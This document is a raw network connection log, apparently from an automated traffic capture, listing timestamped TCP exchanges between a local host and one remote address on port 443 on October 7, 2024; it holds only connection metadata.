Oct 7, 2024 18:47:08.516366959 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.556325912 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.556391001 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.556508064 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.557555914 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.557576895 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.557668924 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.557775974 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.557796955 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.558846951 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.558903933 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.558967113 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.558968067 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.558994055 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.559046984 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.559056997 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.559730053 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.559762955 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.559813976 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.560574055 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.560620070 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.560671091 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.560694933 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.560708046 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.560780048 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.560794115 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.114568949 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.115271091 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.115292072 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.115833998 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.115839005 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.179984093 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.180589914 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.180615902 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.181263924 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.181271076 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.182275057 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.182754040 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.182770967 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.183136940 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.183141947 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.204361916 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.204826117 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.204848051 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.205250025 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.205257893 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.220489025 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.220544100 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.220618010 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.220628977 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.220925093 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.220932007 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.220946074 CEST	49751	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.221008062 CEST	443	49751	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.223984957 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.224015951 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.224100113 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.224225998 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.224237919 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.236531019 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.237035036 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.237056017 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.237389088 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.237394094 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.277409077 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.277476072 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.277590036 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.277622938 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.277654886 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.277748108 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.277829885 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.277829885 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278448105 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278491020 CEST	49749	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278506994 CEST	443	49749	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278507948 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278569937 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278584957 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278620958 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278629065 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278666019 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278671026 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278701067 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.278712988 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.278722048 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.280540943 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280559063 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.280637026 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280699015 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280719995 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.280761003 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280770063 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280775070 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.280944109 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.280957937 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.288345098 CEST	49752	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.288352966 CEST	443	49752	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.305438042 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.305514097 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.305569887 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.305659056 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.305669069 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.305684090 CEST	49753	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.305691004 CEST	443	49753	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.307718039 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.307764053 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.307835102 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.307946920 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.307964087 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.337872982 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.338056087 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.338105917 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.358257055 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.358266115 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.358280897 CEST	49750	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.358287096 CEST	443	49750	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.366071939 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.366173983 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:09.366267920 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.369297028 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:09.369326115 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.053109884 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.053864002 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.053910017 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.054529905 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.054543018 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.104392052 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.105333090 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.105386972 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.105998039 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.106008053 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.124656916 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.125298023 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.125314951 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.125972986 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.125978947 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.131211996 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.131690979 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.131736994 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.132287025 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.132298946 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.152259111 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.152324915 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.152419090 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.152709961 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.152726889 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.152743101 CEST	49754	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.152750969 CEST	443	49754	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.156059027 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.156099081 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.156187057 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.156347990 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.156359911 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.215055943 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.215126038 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.215178967 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.215590000 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.215605021 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.215620995 CEST	49756	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.215626001 CEST	443	49756	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.221697092 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.221844912 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.221900940 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.223016977 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.223042011 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.223108053 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.223439932 CEST	49755	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.223457098 CEST	443	49755	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.227963924 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.227977991 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.232012033 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.232064009 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.232140064 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.232325077 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.232343912 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.232737064 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.232806921 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.232856989 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.232995033 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.233007908 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.233021021 CEST	49757	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.233026981 CEST	443	49757	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.238814116 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.239335060 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.239351034 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.239417076 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.246926069 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.246941090 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.247625113 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.247631073 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.247725964 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.247735023 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.449321985 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.449392080 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.449516058 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.449845076 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.449868917 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.449881077 CEST	49758	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.449887037 CEST	443	49758	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.453627110 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.453661919 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.453749895 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.453933001 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.453943968 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.896565914 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.897479057 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.897516012 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.898085117 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.898092031 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.985403061 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.986161947 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.986205101 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.986565113 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.986618996 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.986627102 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.986952066 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.986967087 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.987282991 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.987288952 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.992275000 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.992413998 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.992511988 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.992609978 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.992609978 CEST	49759	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.992629051 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.992638111 CEST	443	49759	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.995795012 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.995827913 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:10.995923042 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.996109962 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:10.996123075 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.008764982 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.009134054 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.009150982 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.009471893 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.009476900 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.082623005 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.082784891 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.082881927 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.082958937 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.082978964 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.082988977 CEST	49762	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.082993031 CEST	443	49762	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.084256887 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.084409952 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.084475994 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.084515095 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.084521055 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.084532976 CEST	49761	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.084536076 CEST	443	49761	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.085499048 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.085568905 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.085668087 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.086123943 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.086153030 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.086956978 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.086981058 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.087055922 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.087147951 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.087166071 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.109661102 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.109801054 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.109863997 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.109982967 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.109982967 CEST	49760	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.109992981 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.110002041 CEST	443	49760	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.112255096 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.112657070 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.112679958 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.112755060 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.113019943 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.113034010 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.113620996 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.113630056 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.113790035 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.113806963 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.214589119 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.214646101 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.214701891 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.215096951 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.215105057 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.215127945 CEST	49763	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.215131998 CEST	443	49763	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.218907118 CEST	49768	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.218945980 CEST	443	49768	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.219019890 CEST	49768	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.219207048 CEST	49768	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.219218016 CEST	443	49768	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.267628908 CEST	443	49768	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.268027067 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.268047094 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.268132925 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.268527985 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.268539906 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.637912989 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.638580084 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.638593912 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.639240026 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.639244080 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.723885059 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.723961115 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.724040985 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.724052906 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.725433111 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.725491047 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.725496054 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.725532055 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.729626894 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.729630947 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.739195108 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.739342928 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.739397049 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.739558935 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.739573956 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.739586115 CEST	49764	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.739590883 CEST	443	49764	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.747659922 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.749658108 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.749679089 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.749736071 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.749916077 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.749927044 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.750905991 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.750963926 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.751374960 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.751389027 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.815537930 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.816760063 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.816793919 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.817290068 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.817296028 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.825751066 CEST	443	49769	13.107.246.45	192.168.2.4
